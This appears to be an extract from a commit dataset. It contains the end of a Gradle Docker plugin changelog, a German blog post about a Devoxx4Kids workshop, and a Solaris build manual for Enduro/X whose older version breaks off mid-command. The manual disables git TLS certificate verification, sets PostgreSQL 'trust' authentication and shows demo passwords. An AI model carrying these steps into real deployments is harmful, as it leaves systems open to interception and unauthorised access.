`CreateContainer` - {uri-github}\/pull\/66[Pull request 66].\n* Expose response handlers so users can inject custom handling logic - {uri-github}\/issues\/65[Issue 65].\n* Upgrade to Gradle 2.4 including all compatible plugins and libraries.\n\n[discrete]\n=== v2.3.1 (April 25, 2015)\n\n* Added support for `Binds` when creating containers - {uri-github}\/pull\/54[Pull request 54].\n* Added task for copying files from a container to a host - {uri-github}\/pull\/57[Pull request 57].\n\n[discrete]\n=== v2.3 (April 18, 2015)\n\n* Added task `DockerInspectContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Added property `containerName` to task `DockerCreateContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Allow for linking containers for task `DockerCreateContainer` - {uri-github}\/pull\/53[Pull request 53].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.2.0.\n\n[discrete]\n=== v2.2 (April 12, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.1.0.\n\n[discrete]\n=== v2.1 (March 24, 2015)\n\n* Renamed property `registry` to `registryCredentials` for plugin extension and tasks implementing `RegistryCredentialsAware` to better indicate its purpose.\n_Note:_ This is a breaking change.\n\n[discrete]\n=== v2.0.3 (March 20, 2015)\n\n* Allow for specifying port bindings for container start command. - {uri-github}\/issues\/30[Issue 30].\n* Throw an exception if an error response is encountered - {uri-github}\/issues\/37[Issue 37].\n* Upgrade to Gradle 2.3.\n\n[discrete]\n=== v2.0.2 (February 19, 2015)\n\n* Set source and target compatibility to Java 6 - {uri-github}\/issues\/32[Issue 32].\n\n[discrete]\n=== v2.0.1 (February 10, 2015)\n\n* Extension configuration method for `DockerJavaApplicationPlugin` needs to be registered via extension instance - {uri-github}\/issues\/28[Issue 28].\n\n[discrete]\n=== v2.0 (February 4, 2015)\n\n* Upgrade to Gradle 2.2.1 including all compatible plugins and libraries.\n\n[discrete]\n=== v0.8.3 (February 4, 2015)\n\n* Add project group to default tag built by Docker Java application plugin - {uri-github}\/issues\/25[Issue 25].\n\n[discrete]\n=== v0.8.2 (January 30, 2015)\n\n* Expose method for task `Dockerfile` for providing vanilla Docker instructions.\n\n[discrete]\n=== v0.8.1 (January 24, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.5.\n* Correctly create model instances for create container task - {uri-github}\/issues\/19[Issue 19].\n\n[discrete]\n=== v0.8 (January 7, 2014)\n\n* Allow for pushing to Docker Hub - {uri-github}\/issues\/18[Issue 18].\n* Better handling of API responses.\n* Note: Change to plugin extension. The property `docker.serverUrl` is now called `docker.url`. Instead of `docker.credentials`, you will need to use `docker.registry`.\n\n[discrete]\n=== v0.7.2 (December 23, 2014)\n\n* `Dockerfile` task is always marked UP-TO-DATE after first execution - {uri-github}\/issues\/13[Issue 13].\n* Improvements to `Dockerfile` task - {uri-github}\/pull\/16[Pull request 16].\n * Fixed wrong assignment of key field in environment variable instruction.\n * Allow for providing multiple ports to the expose instruction.\n\n[discrete]\n=== v0.7.1 (December 16, 2014)\n\n* Fixed entry point definition of Dockerfile set by Java application plugin.\n\n[discrete]\n=== v0.7 (December 14, 2014)\n\n* Allow for properly add user-based instructions to Dockfile task with predefined instructions without messing up the order. - {uri-github}\/issues\/12[Issue 12].\n* Renamed task `dockerCopyDistTar` to `dockerCopyDistResources` to better express intent.\n\n[discrete]\n=== v0.6.1 (December 11, 2014)\n\n* Allow for setting path to certificates for communicating with Docker over SSL - {uri-github}\/issues\/10[Issue 10].\n\n[discrete]\n=== v0.6 (December 7, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.4.\n* Added Docker Java application plugin.\n* Better documentation.\n\n[discrete]\n=== v0.5 (December 6, 2014)\n\n* Fixed implementations of tasks `DockerPushImage` and `DockerCommitImage` - {uri-github}\/issues\/11[Issue 11].\n\n[discrete]\n=== v0.4 (November 27, 2014)\n\n* Added task for creating a Dockerfile.\n\n[discrete]\n=== v0.3 (November 23, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.3.\n* Changed package name to `com.bmuschko.gradle.docker`.\n* Changed group ID to `com.bmuschko`.\n* Adapted plugin IDs to be compatible with Gradle's plugin portal.\n\n[discrete]\n=== v0.2 (June 19, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.8.2.\n* Provide custom task type for push operation.\n* Support for using remote URLs when building image - {uri-github}\/issues\/3[Issue 3].\n\n[discrete]\n=== v0.1 (May 11, 2014)\n\n* Initial release.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3487ba7ef788d67c050d568ecaac1d02a62e6e7c","subject":"Update 2017-10-22-Erste-Devoxx4-Kids-in-Paderborn.adoc","message":"Update 2017-10-22-Erste-Devoxx4-Kids-in-Paderborn.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2017-10-22-Erste-Devoxx4-Kids-in-Paderborn.adoc","new_file":"_posts\/2017-10-22-Erste-Devoxx4-Kids-in-Paderborn.adoc","new_contents":"= Erste Devoxx4Kids in Paderborn\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n:hp-image: \/covers\/devoxx4kids-cover.png\n\/\/ :published_at: 2019-01-31\n:hp-tags: devoxx4kids,devoxx\n\/\/ :hp-alt-title: My English Title\nAm 14. Oktober fand in den R\u00e4umen des Heinz-Nixdorf Instituts der universit\u00e4t der erste http:\/\/www.devoxx4kids.de\/paderborn\/[Devoxx4Kids Paderborn Workshop] statt. Morgens um 9 trafen sich X Mentoren und Y Kindern um gemeinsam verschiedene Bereiche der Informatik zu entdecken. Nach einem gemeinsamen Fr\u00fchst\u00fcck konnte der Tag beginnen.\n\nDas Mentorenteam aus Studenten, wiss. Mitarbeiten und freiwilligen aus der lokalen Wirtschaft konnten den Kindern einen Einblick in Spieleprogrammierung, Robotik und Elektronik bieten. Die Teilnehmer wurden in 3 Gruppen eingeteit und jede Gruppe machte jeden Workshop mit um das breite Feld der Informatik kennenzulernen. In der Mittagspause konnten sich alle erholen und sich mit mitgebrachtem Essen und bereitgestelltem Obst f\u00fcr das Gruppenfoto bei sch\u00f6nstem Wetter vor dem Springbrunnen des HNF st\u00e4rken. \n\nNach der letzten Workshoprunde trafen nach und nach die Eltern ein. Die Kinder konnten ihren Eltern ihre Errungenschaften zeigen. Dank einiger Sponsoren konnten die Kinder ihre selbsgeschrieben Programme auch auf einem USB Stick mit nach Hause nehmen. Ein besonderer Dank geht an Z, die den Kindern eine Powerbank als Goodie zur Verf\u00fcngung gestellt haben. Ebenfalls ein Dank an wescale, die f\u00fcr alle Mentoren T-Shirts gestellt haben. Der n\u00e4chste Devoxx4Kids Workshop findet am 3.2 statt. Anmeldungen bei Melanie Margaritis (melanie.margaritis@upb.de). Wer uns als Mentor oder Sponsor unterst\u00fctzen m\u00f6chte, kann sich ebenfalls vertrauensvoll an Frau Margaritis wenden.\n\n","old_contents":"= Erste Devoxx4Kids in Paderborn\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n:hp-image: \/covers\/devoxx4kids-cover.png\n\/\/ :published_at: 2019-01-31\n:hp-tags: devoxx4kids,devoxx\n\/\/ :hp-alt-title: My English Title\nAm 14. Oktober fand in den R\u00e4umen des Heinz-Nixdorf Instituts der universit\u00e4t der erste Devoxx4Kids Paderborn Workshop statt. \n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"b465d46d6905041ed02cb797dae469062a40f6ca","subject":"Updated solaris install manual","message":"Updated solaris install manual\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/solaris_notes.adoc","new_file":"doc\/solaris_notes.adoc","new_contents":"Building Enduro\/X On Oracle Solaris Platform\n============================================\nMadars Vitolins\nv1.0, 2016-06:\n\tInitial draft\n:doctype: book\n\n== About manual\n\nThis manual describes how to build 'Enduro\/X' Oracle Solaris platform. \nDocument is based on Solaris 11 on x86 machine. Compiler used to Enduro\/X is GCC.\n\n== Overview\n\nThis manual includes basic installation of Enduro\/X which does not \ninclude building of documentation and does not use GPG-ME encryption for bridges.\n\nEnduro\/X on Solaris platform is Using System V message queues.\n\n\n== Operating System Configuration\n\nFor OS configuration settings \nsee ex_adminman(guides)(Enduro\/X Administration Manual, Setup System chapter).\nThis step is mandatory be executed, before continuing.\n\n== Installation process\n\nThe installation process will install required pen source packages from \n'http:\/\/www.opencsw.org'. You may install packages with different approach. \nThis is just a sample process for getting build system working on under Solaris.\nFor getting Enduro\/X to work basically we need following packages:\n\n. git\n\n. cmake\n\n. flex\n\n. bison\n\n. libxml2\n\n. gcc\/g++\n\n=== Packages to be installed\n\nThe following operations will be done from root user. This will download\nand install open source packages to local machine:\n\n---------------------------------------------------------------------\n$ su - root\n# pkgadd -d http:\/\/get.opencsw.org\/now\n# \/opt\/csw\/bin\/pkgutil -U\n# \/opt\/csw\/bin\/pkgutil -y -i git libxml2_dev flex bison cmake gmake\n---------------------------------------------------------------------\n\n=== If installing GCC...\n\n---------------------------------------------------------------------\n$ su - root\n# \/opt\/csw\/bin\/pkgutil -y -i gcc4core gcc4g++\n---------------------------------------------------------------------\n\n=== If installing Sun Studio (on Solaris 11)...\n\n- According to: https:\/\/pkg-register.oracle.com\/register\/product_info\/6\/\n\n- Register and request access, download the \nand pkg.oracle.com.key.pem pkg.oracle.com.certificate.pem from Oracle\nto server.\n\nInstallation shows process for 12.4 version, but any later available should\nbe installed. Also note that *.profile* and *$HOME\/ndrx_home* later needs to \nmatch the path, for example *\/opt\/developerstudio12.6*.\n\n---------------------------------------------------------------------\n$ su - root\n# mkdir -m 0775 -p \/var\/pkg\/ssl\n# cp -i download-directory\/pkg.oracle.com.key.pem \/var\/pkg\/ssl\n# cp -i download-directory\/pkg.oracle.com.certificate.pem \/var\/pkg\/ssl\n\n# pkg set-publisher \\\n-k \/var\/pkg\/ssl\/pkg.oracle.com.key.pem \\\n-c \/var\/pkg\/ssl\/pkg.oracle.com.certificate.pem \\\n-G '*' -g https:\/\/pkg.oracle.com\/solarisstudio\/release solarisstudio\n\n# pkg list -af 'pkg:\/\/solarisstudio\/developer\/solarisstudio-124\/*'\n\n# pkg install -nv solarisstudio-124\n\n# pkg install solarisstudio-124\n---------------------------------------------------------------------\n\nIf plan to run \n\n=== If installing Sun Studio (on Solaris 10)...\n\nFirstly download the \"tarfile\" version from Oracle, visit \nhttp:\/\/www.oracle.com\/technetwork\/server-storage\/solarisstudio\/downloads\/tarfiles-studio-12-4-3048109.html\n\nNext once the tar file is on your server, extract it and start the install:\n\n---------------------------------------------------------------------\n# bzip2 -d SolarisStudio12.4-solaris-x86-bin.tar.bz2\n# tar -xf SolarisStudio12.4-solaris-x86-bin.tar\n# cd SolarisStudio12.4-solaris-x86-bin\n# .\/install_patches.sh\n# mv solarisstudio12.4 \/opt\n---------------------------------------------------------------------\n\nFor Solaris 10 also we need gmake to work as \"make\", thus\n---------------------------------------------------------------------\n# ln -s \/opt\/csw\/bin\/gmake \/usr\/bin\/make\n---------------------------------------------------------------------\n\nThis will put the compiler in \"\/opt\/solarisstudio12.4\" the path later used in\nthis tutorial.\n\nAlso for solaris 10 we need \"ar\" tool which we will use from GNU package:\n\n---------------------------------------------------------------------\n# \/opt\/csw\/bin\/pkgutil -y -i gcc4core gcc4g++\n---------------------------------------------------------------------\n\n== Getting the source code\n\nFirstly we need to add \"user1\" under which we will perform build actions.\nFor test purposes we will parepare new user for which Enduro\/X will built \n(this adds the in the path the \/opt\/csw\/bin. You may modify that of your needs.\n(add \/opt\/solarisstudio12.4\/bin if Sun studio is installed)\n\n=== Adding user on Solaris 11\nWe add the user \"user1\" and also set the open file limit to 4096, by\ndefault it is 256 which is too low for unit testing.\n\n---------------------------------------------------------------------\n$ su - root\n# useradd -m user1\n# passwd user1\n# projadd -K \"process.max-file-descriptor=(basic,10000,deny)\" enduroxproject\n# usermod -K \"project=enduroxproject\" user1\n# su - user1\n---------------------------------------------------------------------\n\n=== Adding user on Solaris 10\n\n---------------------------------------------------------------------\n$ su - root\n# useradd -d \\$HOME -m -s \/usr\/bin\/bash -c \"User1 User1\" user1\n# mkdir \\$HOME\n# chown user1:staff \\$HOME\n# su - user1\n---------------------------------------------------------------------\n\n=== Preparing the user environment\n\n---------------------------------------------------------------------\n\n$ bash\n$ cat << EOF >> .profile\nexport PATH=\\$PATH:\/opt\/csw\/bin:\/opt\/solarisstudio12.4\/bin\n# Needed if building with postgres...\nexport LD_LIBRARY_PATH=\\$LD_LIBRARY_PATH:\/opt\/csw\/lib\/64\nEOF\n$ chmod +x .profile\n$ source .profile\n$ cd \\$HOME\n$ GIT_SSL_NO_VERIFY=true git clone https:\/\/github.com\/endurox-dev\/endurox\n$ cd endurox \n$ git config http.sslVerify \"false\"\n---------------------------------------------------------------------\n\n=== Enduro\/X basic Environment configuration for HOME directory\n\nThis code bellow creates 'ndrx_home' executable file which loads basic environment, \nso that you can use sample configuration provided by Enduro\/X in 'sampleconfig' directory. \nThis also assumes that you are going to install to '$HOME\/endurox\/dist' folder.\nThe file bellow will override the sample configuration.\n\n---------------------------------------------------------------------\n$ cat << EOF > $HOME\/ndrx_home\n#!\/bin\/bash\n\necho \"Loading ndrx_home...\"\n# Where app domain lives\nexport NDRX_APPHOME=$HOME\/endurox\n# Where NDRX runtime lives\nexport NDRX_HOME=\\$HOME\/endurox\/dist\/bin\n# Debug config too\nexport NDRX_DEBUG_CONF=\\$HOME\/endurox\/sampleconfig\/debug.conf\n# NDRX config too.\nexport NDRX_CONFIG=\\$HOME\/endurox\/sampleconfig\/ndrxconfig.xml\n\nexport FLDTBLDIR=\\$HOME\/endurox\/ubftest\/ubftab\n\nexport PATH=\/usr\/bin:\/usr\/sbin:\/opt\/csw\/bin:\/opt\/solarisstudio12.4\/bin:\/opt\/csw\/bin:\\$HOME\/endurox\/dist\/bin\nexport LD_LIBRARY_PATH=\/usr\/lib\/sparcv9:\\$HOME\/endurox\/dist\/lib64:\/opt\/solarisstudio12.4\/lib:\/usr\/lib64:\/opt\/csw\/lib\/64\n\n################################################################################\n# In case if building with Postgresql DB database testing support\n# or building endurox-java with Oracle DB tests (03_xapostgres), then\n# configure bellow setting (demo values provided):\n# If so - uncomment bellow\n################################################################################\n#export EX_PG_HOST=localhost\n#export EX_PG_USER=exdbtest\n#export EX_PG_PASS=exdbtest1\n# currently uses default port\n#export EX_PG_PORT=5432\n#export EX_PG_DB=xe\n\n#\n# If using PostgreSQL for Solaris 11 uncomment:\n#\n#export PATH=$PATH:\/opt\/csw\/libexec\/postgresql\/93\n\n\nEOF\n\n$ chmod +x $HOME\/ndrx_home\n---------------------------------------------------------------------\n\n=== Configuring PostgreSQL\n\nIf Enduro\/X PostgreSQL driver is needed to be build for AIX, the PostgreSQL\nneeds to be installed for build and test purposes. On Solaris 10, PostgreSQL\ncomes with the operating system, thus only access rights and users needs to be\nconfigured.\n\nNote if you plan to use ECPG mode, then ecpg pre-compiler needs to know where\nthe ecpg libraries live. Thus LD_LIBRARY_PATH must be set during the build time.\n\nIt can be done in following way:\n\n--------------------------------------------------------------------------------\n\n# su - user1\n$ cat << EOF >> .profile\nexport LD_LIBRARY_PATH=\/opt\/csw\/lib\/amd64\nEOF\n\n--------------------------------------------------------------------------------\n\nafter this login and log out from user1 to apply the .profile settings.\n\nAlso to active the PostgreSQL inclusion to the build, add *-DENABLE_POSTGRES=ON*\nflag to cmake command line (later in build section).\n\nFor Solaris 11 it needs to be installed:\n\n--------------------------------------------------------------------------------\n\n$ su - root\n\n-- Install with:\n# \/opt\/csw\/bin\/pkgutil -y -i postgresql93\n\n-- Install dev\n# \/opt\/csw\/bin\/pkgutil -y -i postgresql_dev\n\n-- enable for auto start\n# svcadm enable cswpostgresql-93\n\n# su - postgres\n\n-- Create profile entry to have path to postgres binaries\n\n$ cat << EOF > ~\/.profile\n\n#!\/bin\/bash\n\nexport PATH=$PATH:\/opt\/csw\/libexec\/postgresql\/93\/\n\nEOF\n\n$ chmod +x ~\/.profile\n\n-- Start postgres from Postgres user\n$ \/opt\/csw\/bin\/pg_ctl-93 -D \/var\/opt\/csw\/postgresql\/93 -l logfile start\nserver starting \n\n\n\n--------------------------------------------------------------------------------\n\nFor Solaris 10, just enable it:\n\n--------------------------------------------------------------------------------\n\n$ su - root\n# svcadm enable svc:\/application\/database\/postgresql:version_82\n\n--------------------------------------------------------------------------------\n\nNow create the database for Enduro\/X tests (Solaris 10 & 11):\n\n--------------------------------------------------------------------------------\n# su - postgres\n\n$ createuser exdbtest\n\n$ createdb xe\n\n$ psql -d template1\n\n> alter user exdbtest with encrypted password 'exdbtest1';\n> grant all privileges on database xe to exdbtest;\n> \\q\n\n--------------------------------------------------------------------------------\n\nConfiguration files needs to be updated for authentication and distributed\ntransactions must be enabled too.\n\nEdit *postgresql.conf*, set \"max_prepared_transactions\"\nto 1000.\n\nSolaris 10: *\/var\/postgres\/8.2\/data\/postgresql.conf*\n\nSolaris 11(.4): *\/var\/opt\/csw\/postgresql\/93\/postgresql.conf*\n\n--------------------------------------------------------------------------------\n\nmax_prepared_transactions = 1000 # zero disables the feature\n\n--------------------------------------------------------------------------------\n\nFor access permissions and network configuration, update \n*pg_hba.conf*, so that it contains following:\n\nSolaris 10: *\/var\/postgres\/8.2\/data\/pg_hba.conf*\n\nSolaris 11: *\/var\/opt\/csw\/postgresql\/93\/pg_hba.conf*\n\n--------------------------------------------------------------------------------\n\nlocal all all trust\nhost all all 127.0.0.1\/32 md5\nhost all all ::1\/128 md5\n\n--------------------------------------------------------------------------------\n\nRestart PostgreSQL, Solaris 10:\n\n--------------------------------------------------------------------------------\n\n# svcadm restart svc:\/application\/database\/postgresql:version_82\n\n--------------------------------------------------------------------------------\n\nRestart PostgreSQL, Solaris 11:\n\n--------------------------------------------------------------------------------\n\n# svcadm restart cswpostgresql-93\n\n--------------------------------------------------------------------------------\n\n== Building the code with GCC\n\nIt is assumed that gcc is default compiler on the system (i.e. Oracle Studio not installed), \nthus following cmake will pick up gcc by default:\n\n=== Solaris 11\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\n$ cmake -DCMAKE_CXX_COMPILER=g++ -DCMAKE_C_COMPILER=gcc\\\n-DDEFINE_DISABLEDOC=ON -DDEFINE_DISABLEGPGME=ON -DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist -DCMAKE_LIBRARY_PATH=\/opt\/csw\/lib\/amd64 .\n$ make \n$ make install\n---------------------------------------------------------------------\n\n=== Solaris 10\n\nAlso note that CC variable needs to be exported as it is used by \nbuildclient script for view test cases.\n\n---------------------------------------------------------------------\n$ export CC=gcc\n$ cd \\$HOME\/endurox\n$ cmake -D CMAKE_AR=\/opt\/csw\/gnu\/ar -DCMAKE_CXX_COMPILER=g++ -DCMAKE_C_COMPILER=gcc \\\n-DDEFINE_DISABLEDOC=ON -DDEFINE_DISABLEGPGME=ON -DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist .\n$ make \n$ make install\n---------------------------------------------------------------------\n\n\n== Building the code with Solaris Studio\n\nThe compilation will be done in 64bit mode\n\n=== Solaris 11\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\n$ cmake -DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist -DDEFINE_DISABLEGPGME=ON -DDEFINE_DISABLEDOC=ON .\n---------------------------------------------------------------------\n\nIn case if errors like\n\n---------------------------------------------------------------------\nld: fatal: file \/usr\/lib\/values-xpg6.o: wrong ELF class: ELFCLASS32\n---------------------------------------------------------------------\n\nappears, temporary solution is to replace that particular file with 64bit version.\nIt appears that Solaris Studio compiler ignores the \"-m64\" architecture flags\nand does not use \"\/usr\/lib\/amd64\/values-xpg6.o\" where it requires.\n\n---------------------------------------------------------------------\n# su - root\n# mv \/usr\/lib\/values-xpg6.o \/usr\/lib\/values-xpg6.o.OLD\n# ln -s \/usr\/lib\/amd64\/values-xpg6.o \/usr\/lib\/values-xpg6.o\n---------------------------------------------------------------------\n\n=== Solaris 10 (NOT SUPPORTED)\n\nThis assumes that GCC is installed, and \"ar\" from gcc will be used.\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\n$ cmake -D CMAKE_AR=\/opt\/csw\/gnu\/ar \\\n-DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist -DDEFINE_DISABLEGPGME=ON -DDEFINE_DISABLEDOC=ON .\n---------------------------------------------------------------------\n\nThe support is not available for Solaris Studio on Solaris 10 due\nto Thread Local Storage errors like during the linking:\n\n---------------------------------------------------------------------\nld: fatal: relocation error: R_SPARC_TLS_LDO_LOX10: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.first: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_ADD: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.first: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_HIX22: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_LOX10: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_ADD: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_HIX22: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_LOX10: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_ADD: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\n---------------------------------------------------------------------\n\nThus at this time only GCC is supported for Solaris 10.\n\n\n== Building the code\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\n$ make \n$ make install\n---------------------------------------------------------------------\n\nThis will produce binaries in '\\$HOME\/endurox\/dist' folder.\n\n== Unit Testing\n\nEnduro\/X basically consists of two parts:\n. XATMI runtime;\n. UBF\/FML buffer processing. \nEach of these two sub-systems have own units tests.\n\n=== UBF\/FML Unit testing\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\/sampleconfig\n$ source setndrx\n$ cd \\$HOME\/endurox\/ubftest\n$ .\/ubfunit1 2>\/dev\/null\nRunning \"main\" (76 tests)...\nCompleted \"ubf_basic_tests\": 198 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_Badd_tests\": 225 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_genbuf_tests\": 334 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_cfchg_tests\": 2058 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_cfget_tests\": 2232 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fdel_tests\": 2303 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_expr_tests\": 3106 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fnext_tests\": 3184 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fproj_tests\": 3548 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_mem_tests\": 4438 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fupdate_tests\": 4613 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fconcat_tests\": 4768 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_find_tests\": 5020 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_get_tests\": 5247 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_print_tests\": 5655 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_macro_tests\": 5666 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_readwrite_tests\": 5764 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_mkfldhdr_tests\": 5770 passes, 0 failures, 0 exceptions.\nCompleted \"main\": 5770 passes, 0 failures, 0 exceptions.\n\n---------------------------------------------------------------------\n\n=== XATMI Unit testing\nATMI testing might take some time. Also ensure that you have few Gigabytes of free \ndisk space, as logging requires some space (about ~10 GB).\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\/atmitest\n$ nohup .\/run.sh &\n$ tail -f \\$HOME\/endurox\/atmitest\/test.out\n...\n************ FINISHED TEST: [test028_tmq\/run.sh] with 0 ************\nCompleted \"atmi_test_all\": 28 passes, 0 failures, 0 exceptions.\nCompleted \"main\": 28 passes, 0 failures, 0 exceptions.\n---------------------------------------------------------------------\n\n== Troubleshooting\n\nThis section lists some notes about fixing most common problems with Solaris build.\n\n=== Problems with library modes\n\nIf having issues with linking particular library version, for example building\nin 64bit mode, but for some reason CMake is linking with 32bit libs (for example\nwith PostgreSQL), then following flag may be applied *CMAKE_LIBRARY_PATH* to\npoint to correct path for libraries. For example:\n\n---------------------------------------------------------------------\n$ cmake -DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist -DDEFINE_DISABLEDOC=ON\\\n -DENABLE_POSTGRES=ON -DDEFINE_DISABLEGPGME=ON -DCMAKE_LIBRARY_PATH=\/opt\/csw\/lib\/amd64 .\n---------------------------------------------------------------------\n\n== Conclusions\n\nAt finish you have a configured system which is read to process the transactions\nby Enduro\/X runtime. It is possible to copy the binary version ('dist') folder\nto other same architecture machines and run it there with out need of building.\n\n:numbered!:\n\n[bibliography]\nAdditional documentation \n------------------------\nThis section lists additional related documents.\n\n[bibliography]\n.Resources\n- [[[BINARY_INSTALL]]] See Enduro\/X 'binary_install' manual.\n\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\nThe index is normally left completely empty, it's contents being\ngenerated automatically by the DocBook toolchain.\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n","old_contents":"Building Enduro\/X On Oracle Solaris Platform\n============================================\nMadars Vitolins\nv1.0, 2016-06:\n\tInitial draft\n:doctype: book\n\n== About manual\n\nThis manual describes how to build 'Enduro\/X' Oracle Solaris platform. \nDocument is based on Solaris 11 on x86 machine. Compiler used to Enduro\/X is GCC.\n\n== Overview\n\nThis manual includes basic installation of Enduro\/X which does not \ninclude building of documentation and does not use GPG-ME encryption for bridges.\n\nEnduro\/X on Solaris platform is Using System V message queues.\n\n\n== Operating System Configuration\n\nFor OS configuration settings \nsee ex_adminman(guides)(Enduro\/X Administration Manual, Setup System chapter).\nThis step is mandatory be executed, before continuing.\n\n== Installation process\n\nThe installation process will install required pen source packages from \n'http:\/\/www.opencsw.org'. You may install packages with different approach. \nThis is just a sample process for getting build system working on under Solaris.\nFor getting Enduro\/X to work basically we need following packages:\n\n. git\n\n. cmake\n\n. flex\n\n. bison\n\n. libxml2\n\n. gcc\/g++\n\n=== Packages to be installed\n\nThe following operations will be done from root user. This will download\nand install open source packages to local machine:\n\n---------------------------------------------------------------------\n$ su - root\n# pkgadd -d http:\/\/get.opencsw.org\/now\n# \/opt\/csw\/bin\/pkgutil -U\n# \/opt\/csw\/bin\/pkgutil -y -i git libxml2_dev flex bison cmake gmake\n---------------------------------------------------------------------\n\n=== If installing GCC...\n\n---------------------------------------------------------------------\n$ su - root\n# \/opt\/csw\/bin\/pkgutil -y -i gcc4core gcc4g++\n---------------------------------------------------------------------\n\n=== If installing Sun Studio (on Solaris 11)...\n\n- According to: https:\/\/pkg-register.oracle.com\/register\/product_info\/6\/\n\n- Register and request access, download the \nand pkg.oracle.com.key.pem pkg.oracle.com.certificate.pem from Oracle\nto server.\n\nInstallation shows process for 12.4 version, but any later available should\nbe installed. Also note that *.profile* and *$HOME\/ndrx_home* later needs to \nmatch the path, for example *\/opt\/developerstudio12.6*.\n\n---------------------------------------------------------------------\n$ su - root\n# mkdir -m 0775 -p \/var\/pkg\/ssl\n# cp -i download-directory\/pkg.oracle.com.key.pem \/var\/pkg\/ssl\n# cp -i download-directory\/pkg.oracle.com.certificate.pem \/var\/pkg\/ssl\n\n# pkg set-publisher \\\n-k \/var\/pkg\/ssl\/pkg.oracle.com.key.pem \\\n-c \/var\/pkg\/ssl\/pkg.oracle.com.certificate.pem \\\n-G '*' -g https:\/\/pkg.oracle.com\/solarisstudio\/release solarisstudio\n\n# 